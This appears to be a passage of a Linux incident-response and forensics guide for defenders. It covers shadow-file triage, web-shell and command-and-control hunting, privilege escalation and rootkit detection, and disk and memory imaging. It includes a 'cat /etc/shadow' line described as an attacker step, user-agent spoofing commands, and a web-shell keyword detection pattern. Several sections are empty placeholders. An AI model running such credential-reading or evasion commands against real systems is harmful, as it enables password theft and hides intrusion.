The Threat Actor may also want to look at the user password hashes and copy them out for cracking: https://www.cyberciti.biz/faq/understanding-etcshadow-file/

cat /etc/shadow

/etc/shadow overview


Like the passwd file, each field is separated by a colon “:” and the format of the shadow file is the following:


  • Username

  • Password (stored as a salted one-way hash), with a prefix indicating the hashing algorithm:

    • $1$ is MD5

    • $2a$ is bcrypt (Blowfish-based)

    • $5$ is SHA-256

    • $6$ is SHA-512

  • Last password change

  • Minimum password age

  • Maximum password age

  • Warn period

  • Inactivity period

  • Expiration date

  • Unused field
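These fields can be pulled apart with awk for quick triage. A minimal sketch (reading /etc/shadow requires root; the output format is illustrative):

```shell
# Print account name, hash-algorithm prefix, and last-change day for each entry;
# a second field of "*" or "!" means the account is locked or has no password set
awk -F: '{ printf "%-16s %-6s last_change_day=%s\n", $1, substr($2,1,3), $3 }' /etc/shadow
```

Accounts with recently changed passwords, or service accounts that suddenly have a password hash, are worth investigating.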


Search for signs of Command & Control


Linux - Web Activity Related Commands


On Linux servers, web-based connections initiated through command-line tools can be a red flag, as servers typically don’t have users browsing the web. Threat actors often use these commands to download and install additional software or tools, making such activity a potential indicator of malicious behavior.

Both cURL and wget allow attackers to easily change the user agent string, which can indicate defense evasion tactics. This is why knowing the normal patterns in your environment is crucial. For example, if you typically see web requests from Linux systems using the default cURL user agent, any deviation from this should raise a red flag and prompt investigation into why the traffic is using a different user agent string. You can also extend your detection strategy to alert when shell commands attempt to change the user agent string value, for example, curl with the -A switch and wget with the --user-agent switch.

curl -A "user-agent-name-here"
wget --user-agent="user-agent-name-here"

Bind Shell/Web Shell: Running a bind shell in the background for remote access.


The attacker’s machine acts as a client and the victim’s machine acts as a server, which opens a communication port and waits for the client (attacker) to connect to it, and then issues commands to be executed remotely on the victim’s machine.


grep -rlE 'fsockopen|pfsockopen|exec|shell|system|eval|rot13|base64|base32|passthru|\$_GET|\$_POST|\$_REQUEST|cmd|socket' /var/www/html/*.php | xargs -I {} echo "Suspicious file: {}"

Web Server files


Common web server logs to check (Apache, Nginx):


access.log


cat access_log | cut -d' ' -f11 | cut -d'/' -f3 | sort | uniq -c | sort -nr | head -10
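Alongside the tally above, a couple of other one-liners help surface noisy clients and unusual user agents in a combined-format access log:

```shell
# Top 10 client IPs by request count
cut -d' ' -f1 access_log | sort | uniq -c | sort -nr | head -10

# Top user-agent strings (sixth quote-delimited field in the combined format)
awk -F'"' '{print $6}' access_log | sort | uniq -c | sort -nr | head -10
```

Rare user agents, or scripted clients like curl and python-requests appearing where browsers are expected, are good pivot points.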


error.log


Default Apache combined log format:


LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined


%h - Remote host/IP

%l - Remote logname

%u - Remote user

%t - Time the request was received

%r - First line of the request

%>s - Final status code

%O - Bytes sent, including headers

%{header}i - Contents of the specified header in the request


Search for signs of privilege escalation


The first key to understanding privilege escalation is knowing your system's privileged accounts, how they are managed, and how they are used.


  • The King of Linux “root”

  • The Secret Keys of Linux “the Private SSH key”

  • sudoers users and setuid/setgid

  • System Admin Accounts

  • Emergency Accounts

  • Service Accounts such as www-data

  • Elevated “Dev Accounts”

  • Privileged Data User Accounts


Common techniques for escalating privilege.


  • Kernel exploits

  • Application vulnerabilities

  • Misconfigurations such as weak file permissions

  • Abuse of sudo

  • Abuse of setuid and setgid

  • Cron jobs

  • Poor passwords
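Several of these paths can be checked quickly with built-in tools. A short sketch (the -xdev flag keeps find on one file system; drop it to search everything):

```shell
# Setuid and setgid binaries (compare against a known-good baseline)
find / -xdev -perm -4000 -type f -ls 2>/dev/null
find / -xdev -perm -2000 -type f -ls 2>/dev/null

# World-writable files an attacker could abuse
find / -xdev -type f -perm -0002 -ls 2>/dev/null

# What the current user may run via sudo
sudo -l 2>/dev/null
```

Unexpected setuid binaries, particularly in /tmp or home directories, are a classic escalation artifact.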


Automated tools to find privilege escalation paths in Linux.


  • LinEnum–Linux Enumeration Script

  • LinPEAS - Linux Privilege Escalation Awesome Script

  • Linux Smart Enumeration

  • Linux Exploit Suggester 2



The first character of an ls -l listing shows the file type, and the special permission bits (setuid/setgid, sticky) appear in the execute positions:

1. - : regular file, no special type

2. d : directory

3. l : symbolic link

4. s : setuid or setgid is set (shown in the owner or group execute position)

5. t : sticky bit is set (shown in the others execute position)


Search for signs of lateral movement


???


Search for signs of exfiltration


???

Finding zip files


The most common compression types used in Linux are:


.zip files

.tar files

.tar.gz files

.tar.bz2 files

find / -type f \( -iname "*.rar" -o -iname "*.zip" -o -iname "*.7z" -o -iname "*.tar" -o -iname "*.bz2" -o -iname "*.gz" -o -iname "*.zipx" \) 2>/dev/null
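Exfiltration staging often happens in world-writable or user directories shortly before data leaves the system, so it can help to narrow the search to recently created archives there. An illustrative variant (directory list and time window are assumptions to adjust per case):

```shell
# Recently modified archives in common staging locations (last 7 days)
find /tmp /var/tmp /dev/shm /home -type f \
    \( -iname "*.zip" -o -iname "*.tar" -o -iname "*.tar.gz" -o -iname "*.tar.bz2" \) \
    -mtime -7 -ls 2>/dev/null
```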


Unix Like artifact collector


In Linux Incident Response (IR), identifying persistence mechanisms is crucial for detecting threat actors. One effective tool for analyzing persistence is the Linux PANIX tool, a versatile and highly customizable resource for security research, detection engineering, and penetration testing. You can find it here: https://github.com/Aegrah/PANIX?utm_source=substack&utm_medium=email


Other Linux items to check


???


Linux Searching for file modifications

(Taken from Hal Pomeranz)


Walk downwards from the given directory and display all files and directories modified (“-mtime”) less than seven days (“-7”, “more than seven” would be “+7”) ago

find /dirpath/dirpath/dirpath -mtime -7

Find options like "-mtime" only work at one-day granularity; the "-newer" option lets you discover files that were modified after some other file. This is helpful if you can pinpoint early modifications by the attacker in the file system. First, create your own timestamped file (e.g., with touch), then use it with the "-newer" argument to establish an exact base time to search forward from, with more granularity than "-mtime":

find /dirpath/dirpath/dirpath -newer /dirpath/dirpath/dirpath/<touchstamped file>

Sorted by mtime, oldest first. “ls -rt” is a reverse sort by time (oldest to newest), “-l” gives file details. “-A” shows “hidden” files whose name starts with a period

ls -lArt /dirpath/dirpath/dirpath

Other Investigative Items


  • 'lost+found' becomes a good proxy for when the file system was created (e.g., when the OS was installed)

stat lost+found
  • Many exploits leverage /tmp and /dev/shm directories on Linux systems because they are typically world-writable. Any process operating from /tmp or /dev/shm should be considered suspicious and warrants further investigation.

    • Look for randomness. Syntax of random string letters is eye opening because malware will do this through a function to ensure they don’t conflict with system files.

    • Processes running from tmp or dev

ls -alR /proc/*/cwd 2> /dev/null | grep tmp 
ls -alR /proc/*/cwd 2> /dev/null | grep dev
  • Executables anywhere in tmp.

find / -type f -exec file -p '{}' \; | grep ELF
find /tmp -type f -exec file -p '{}' \; |  grep ELF

  • Common targeted directories are /tmp, /var/tmp, /dev/shm, /var/run, /var/spool, user home directories

  • Examination of /etc. Creation and modification times of files could indicate when a particular configuration was added to the system.

  • Immutable files

  • Hidden files

 find / -type d -name ".*"
  • Deleted binaries still running

ls -alR /proc/*/exe 2> /dev/null | grep deleted
  • Changes to /etc/ssh/sshd_config. For example, listening for SSH on other ports.

  • Search the system for malware hashes. Create recursively md5 hashes from all files in that directory:

find ./backup -type f -print0 | xargs -0 md5sum > /checksums_backup.md5
  • Use ldd on suspicious binaries to see what shared objects they have.

  • Common locations to check for userland rootkits.

/lib/x86_64-linux-gnu
/lib/*
/usr/lib/x86_64-linux-gnu
/usr/lib/*
ls -la /etc/ld*
cat /etc/ld.so.preload
ldd /bin/ls
ldd /bin/bash
ldd /usr/bin/ssh
ldd /usr/bin/netstat
ldd /bin/* #check for shared object in binary, which you suspect
ldd /usr/bin/* #check for shared object in binary, which you suspect
/proc/*/maps

Linux Root Kits


Rootkits often hook system functions to hide files, directories, and processes, making them challenging to detect during investigations. Since Linux exposes process information through the /proc filesystem, rootkits can manipulate it to conceal malicious processes. However, detection methods, using both built-in tools and specialized rootkit scanners such as RKHunter, unhide, Tracee (eBPF), and chkrootkit, can uncover rootkits. Here are two common rootkit detection techniques using native Linux tools:


Directory Link Count Anomalies


The Linux filesystem tracks the "link count" for all objects, including directories. The link count for any directory is always at least two:


  • ./: Points to the current directory.

  • ../: Points to the parent directory.


Additionally, each subdirectory increments the parent directory's link count by one. This means:


Link Count = 2 + Number of Subdirectories


  • To verify this, use ls -l to view the link count and ls -a to display all hidden directories (./ and ../).


Rootkits often hook tools like ls to hide files and directories. However, they struggle to manipulate the link count consistently. If the link count doesn’t match the visible subdirectories (minus two), it may indicate a hidden directory, suggesting the presence of a rootkit. Rootkits typically fail to manage link counts without significantly increasing their complexity, making this an effective detection method.
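The check above can be scripted: for each directory of interest, compare the link count reported by stat with two plus the number of visible subdirectories. A sketch (the swept directories are illustrative; note that some file systems, such as btrfs and overlayfs, do not follow this link-count convention and will produce false positives):

```shell
# Flag directories whose link count disagrees with 2 + visible subdirectories
for d in /tmp /var/tmp /dev/shm; do
    links=$(stat -c %h "$d" 2>/dev/null)
    subdirs=$(find "$d" -mindepth 1 -maxdepth 1 -type d 2>/dev/null | wc -l)
    if [ -n "$links" ] && [ "$links" -ne $((subdirs + 2)) ]; then
        echo "Possible hidden subdirectory in $d (links=$links, visible=$subdirs)"
    fi
done
```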


Process Tampering in the /proc Filesystem


Most Linux user-space tools (e.g., ps, netstat) retrieve process information from the /proc filesystem. Rootkits attempt to hide their malicious processes by manipulating /proc/<PID> directories.


To detect this tampering:


  • Attempt to cd into each /proc/<PID> directory.

  • If a directory listed in /proc does not exist, it suggests that a Linux Kernel Module (LKM) rootkit is hiding process-related information.
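This comparison can also be automated by walking /proc and checking each PID against ps. Short-lived processes can produce false positives as they exit mid-scan, so repeated hits on the same PID matter more than a single one:

```shell
# PIDs with a /proc entry but invisible to ps may be hidden by a rootkit
for p in /proc/[0-9]*; do
    pid=${p#/proc/}
    if ! ps -p "$pid" > /dev/null 2>&1; then
        echo "PID $pid present in /proc but not visible to ps"
    fi
done
```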


Checking logs for information related to rootkits.


dmesg

/var/log/kern.log

/var/log/dmesg*


Console based attacks




Linux Disk Forensics


Linux Disk Overview


  • Blocks hold data

  • The smallest addressable unit is a sector (512 bytes)

  • For efficiency, disk I/O is performed in whole blocks; a block is made up of one or more sectors (4 KB blocks are common).

  • A file smaller than a block still occupies a whole block; the unused remainder is left empty (this is also how the end of the file is found).

  • A file larger than a block spans multiple blocks. Linux file systems try to keep a file's blocks together within the same block group; if that is not possible the file is fragmented, but this is relatively rare.

  • This makes data recovery easier: if you find the start of a file, the rest of the file should be in the blocks directly next to it.

  • Metadata is stored in the inode. The inode contains most of the information shown by the 'ls' command (file type, access rights, owner, timestamps, size, pointers to data blocks), but it does not hold the file name.

  • File name layer: a directory is nothing more than a list of file names and inode numbers


Linux Disk Forensics Overview


  • If the Linux system is running on a VM, it is easiest to take a snapshot of the VM to obtain disk and memory images. However, to analyze the snapshot's disk image with your forensic software, you may need to convert it into a raw disk image.

  • Imaging a physical device:

    • Free capture tools:

  • If you are analyzing disk images with the Linux and Open Source forensic toolchain, then the forensics images need to be in raw form. Common forensic formats such as E01, AFF, and even split raw are not directly usable by many Linux commands.



Imaging Linux - Physical device - dcfldd


List out disks with fdisk.


Disk partition management with parted. This shows how much space is on each partition and the file system type.

Specify the device you are copying the data to (for example, a forensics USB drive). The examples below assume the forensic analysis drive is /dev/sdb.


Creating a new partition on acquired drive.

  • Enter m at the prompt to see options.

  • You want to create a new partition (type "n"). You will make the partition number 1 and primary and accept the defaults

  • Once partition is created, type "w" which will write the partition to the table and exit fdisk


Adding a file system to the acquired drive so data can be added.

Rerun fdisk -l and parted -l and you should see the valid partition.



Making a mount point for the new partition/file system and mounting it to the mount point.


  • mkdir is make directory

  • /mnt/driveloc is simply the folder location you are creating. So now you have a folder called mnt, and within that a folder called driveloc

  • Now that the location has been created, you need to mount sdb1 to that location. This will let you see the contents of sdb1. Use the command mount /dev/sdb1 /mnt/driveloc to mount the sdb1 drive to the folder driveloc.



Using the Linux tool dcfldd, duplicate the drive /dev/sdb1, creating both MD5 and SHA-256 hashes of the drive. Place the copy of the drive in /root and name it driveimage.dd:

dcfldd if=/dev/sdb1 hash=md5,sha256 md5log=/root/md5.txt sha256log=/root/sha256.txt hashconv=after conv=noerror,sync of=/root/driveimage.dd


  • The command begins with dcfldd. if=/dev/sdb1 designates the source drive that will be copied.

  • hash=md5,sha256 designates the types of hashes to be generated as the disk image is created.

  • md5log=/root/md5.txt sha256log=/root/sha256.txt designates that the hash logs will be written to two text files within the root user's home folder.

  • hashconv=after designates that the hash values will be computed after the disk conversion. Alternatively, 'before' can be selected.

  • conv=noerror,sync means that if there are read errors while creating the disk image, dcfldd will pad the unreadable blocks and continue writing rather than stopping.

  • of=/root/driveimage.dd is the disk image file that will be created; /root ensures that it is written to the root user's home folder.

  • dcfldd will also print out how many records were copied during the creation of the disk image.

  • The hash logs and disk image file should now be in the Home Folder.  If you open the hash logs you can view the hashes of the image disk that was created. 


Change the permissions of the drive copy to “read only” so it cannot be tampered with.

  • chmod a-w /root/driveimage.dd in order to change the permissions to read-only.

Calculate md5 and sha256 of the original suspect drive.

  • sha256sum /dev/sdb1 > /root/original.sha256.txt

  • md5sum /dev/sdb1 > /root/original.md5.txt

Compare the original suspect drive md5sum hash to the hash value logged for the copy of the previously imaged drive using dcfldd.

Compare the original suspect drive sha256 hash to the hash value logged for the copy of the previously imaged drive using dcfldd.
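The comparison itself is just hashing the copy and diffing the values against the logs. A minimal sketch using the file names from the steps above (the copy.md5.txt name is illustrative):

```shell
# Hash the image copy and keep only the hash value
md5sum /root/driveimage.dd | cut -d' ' -f1 > /root/copy.md5.txt

# Compare against the hash of the original drive;
# diff produces no output when the values match
cut -d' ' -f1 /root/original.md5.txt > /root/orig.md5.txt
diff /root/orig.md5.txt /root/copy.md5.txt && echo "MD5 hashes match"
```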



Example using dc3dd

dc3dd if=/dev/sdb1 of=/evidence/image.dd hash=sha256 hashlog=hash.log log=image.log

Analyzing the Linux disk data with Linux based tool chain


  • Linux file systems are often encapsulated within additional layers of complexity which can include:

  • Linux’s built-in disk encryption system (dm-crypt and LUKS)

  • software RAID capabilities.

  • Linux Logical Volume Management (LVM) is a very common “soft partitioning” scheme that allows file systems to be resized on the fly


Other Linux tool chain notes:


Linux commands want to operate on a disk device, not a disk image file. Fake them out by using a virtual "loopback" device. The losetup command associates a loopback device with a raw disk image; the -o option supplies the byte offset of the partition within the image (here, a partition starting at sector 501760):

losetup -rf -o $((501760*512)) image.dd


A forensically copied file system is often "dirty" (its journal was not replayed): when the forensic image was taken the OS was still running, so there are uncommitted transactions in the file system journal. Forensically, we mount read-only, which prevents replaying them, but in reality the file system is probably in good enough shape. The 'noload' option forces the file system to load without processing the journal.
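Putting the pieces together, mounting a partition from a raw image might look like this (the loop device number and offset are illustrative, and these commands require root):

```shell
# Attach the image read-only at the partition's byte offset
losetup -rf -o $((501760*512)) /evidence/driveimage.dd

# Mount read-only without replaying the journal
mkdir -p /mnt/evidence
mount -o ro,noload /dev/loop0 /mnt/evidence
```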


Linux Memory Forensics


Memory forensics is a critical component of incident response, offering unique insights that cannot be obtained from traditional disk forensics. Key values include:


  • Detection of Memory-Resident Malware: Identifies malware that operates solely in memory and does not leave traces on disk, such as fileless malware.

  • Recovery of Volatile Data: Captures transient information like active processes, open network connections, and encryption keys that disappear upon system shutdown.

  • Rootkit Detection: Exposes rootkits hiding malicious activity by comparing in-memory data with on-disk or system-reported information.

  • Insight into Suspicious Processes: Enables the analysis of process execution, including injected code and hidden threads

  • Network Analysis: Provides details on live connections, unencrypted data, and session activity.

  • Attack Reconstruction: Helps recreate an attacker’s actions by analyzing artifacts like command execution, loaded modules, and memory dumps of running applications.


Memory analysis begins with acquiring a memory dump, which serves as the foundation for further investigation. The approach depends on whether the system is running as a virtual machine (VM) or physical hardware:


  • Virtual Machines: Memory can be extracted directly from VM files.

  • Physical Systems: Memory must be acquired from the running system. Many Linux systems provide access to physical memory via /proc/kcore, a file that represents the system's RAM in a core file format. While it displays a size equal to the physical memory plus 4 KB, it is not human-readable and is intended for use with debuggers like gdb. Avoid using tools like cat to read this file.


Tools for Linux Memory Acquisition


Microsoft AVML (Acquire Volatile Memory for Linux):


  • Open-source tool developed in Rust.

  • Captures memory without loading a kernel driver, reducing system impact.

  • Saves the memory image locally, which can risk overwriting evidence unless redirected to external storage.


Linux Memory Grabber (LMG):


  • A shell script by Hal Pomeranz that automates Linux memory acquisition.

  • Uses /proc/kcore or /dev/crash if available.

  • Can build and load the LiME (Linux Memory Extractor) kernel module when necessary.

  • Facilitates memory dumping and creates a Volatility profile for analysis.


After capturing the system memory, it can then be analyzed with the memory analysis tool Volatility: https://github.com/volatilityfoundation/volatility/wiki/Linux-Command-Reference




Linux Incident Response Checklist


Suspicious network connections


  • Found by sensor/instrumentation outside of server?

  • Netstat analysis. Suspicious network connection found?


Logon analysis


  • /var/log/wtmp

  • /var/log/btmp

  • /var/log/lastlog

  • /var/log/secure

  • /var/log/audit

  • /var/log/journal


Suspicious process analysis


  • Suspicious process found?

  • Process exe hash analysis

    • Hash found in CTI

  • Process exe cmdline analysis

  • Process exe strings analysis

  • Process exe status analysis

  • is suspicious binary behind process in memory only?


Persistence analysis


  • Cron jobs?

  • Processes set to start (systemd)

  • User analysis

    • Added users?

    • Edited users?

    • Enabled users

    • Users UID 0

  • Shell profile analysis

  • SSH keys analysis


Bash log analysis


Defense evasion analysis


  • Shell history tampering?

  • Stopping/deleting logs?

  • Stopping/editing firewalls?

  • Stopping/editing AV/EDR?


Search for signs of discovery


  • System enumeration

  • Accessing sensitive files (/etc/shadow)


Search for signs of Command & Control


  • Web activity

    • wget usage

    • curl usage

  • Web shells

  • Web logs


Search for signs of privilege escalation


  • Kernel exploits

  • Application vulnerabilities

  • Misconfigurations such as weak file permissions

  • Abuse of sudo

  • Abuse of setuid and setgid


Search for signs of lateral movement


Search for signs of exfiltration


  • Zip files and staging


Other analysis


  • System changes

  • Analysis of /tmp

  • Deleted files

  • Rootkits


References


Linux Proc forensics:




Linux Command line forensics sheet:


bash scripts for Linux IR:



Linux Persistence:



PANIX "Persistence Against NIX":



Linux lsof troubleshooting:



Systemd services:



Journalctl:


Linux priv escalation:


Linux rootkits:





Linux rootkits (with PID hiding detection script):


Fortinet writeup on Ivanti Kernel rootkit:


Linux memory:


Linux response data collection scripts:












Disabling audit logs:


Package manager persistence:


FirewallD Geo Blocking:


Linux Compression:


Privilege escalation:


Bash history:


Logging bash history to an external syslog server:


Logging bash history with trap:


Logging bash history with shopt:


dd, dc3dd and dcfldd:
